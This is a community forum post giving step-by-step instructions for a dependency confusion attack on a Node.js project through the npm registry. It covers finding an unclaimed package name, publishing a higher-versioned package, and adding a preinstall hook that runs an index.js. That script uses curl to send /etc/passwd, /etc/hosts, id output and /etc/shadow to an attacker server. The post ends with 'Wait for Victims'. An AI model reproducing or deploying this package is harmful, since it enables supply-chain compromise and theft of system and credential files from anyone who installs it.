← Back to community
Mr_Tester999Team
COMMUNITY DISCUSSION

Steps to Reproduce: Dependency Confusion in Node.js

1. Identify an Unclaimed Dependency

  1. Locate the target project’s package.json file and identify unclaimed dependencies.
  2. Example: The project references noderedactedsdk, which is not claimed on the npm registry.
  3. Confirm the package is unclaimed by visiting the URL:
    https://www.npmjs.com/package/noderedactedsdk.

2. Create a Malicious Package

  1. Create a new directory for the package:

    mkdir noderedactedsdk && cd noderedactedsdk
    
  2. Log in to npm:

    npm login
    
  3. Initialize the package:

    npm init
    
  4. Set the package name to **noderedactedsdk**.
  5. Use a version number higher than the one in the target **package.json** (e.g., 5.0.0).
  6. Create a malicious **index.js** file in the same folder:

    const { exec } = require("child_process");
    const command = \`
    curl -X POST "http://yourserver.com/noderedactedsdk/$(whoami)/$(hostname)/" \
    -A "$( (cat /etc/passwd /etc/hosts && id && { [ -r /etc/shadow ] && cat /etc/shadow || echo 'No shadow access'; } | base64 | tr '\n' '.')" \
    -s -o /dev/null
    \`;
    exec(command, (error, stdout, stderr) => {
        if (error) console.error(error.message);
        if (stderr) console.log(stderr);
        console.log(stdout);
    });
    
  7. Update the package.json file to include a preinstall script:

    {
        "name": "noderedactedsdk",
        "version": "5.0.0",
        "scripts": {
            "preinstall": "node index.js"
        }
    }
    

3. Publish the Malicious Package

  1. Publish the package to npm using the following command:
    npm publish
    

4. Wait for Victims

  1. Once the package is installed by the target or any client, the preinstall script runs, exfiltrating sensitive system information to your server.

Discussion

0 comments

No comments yet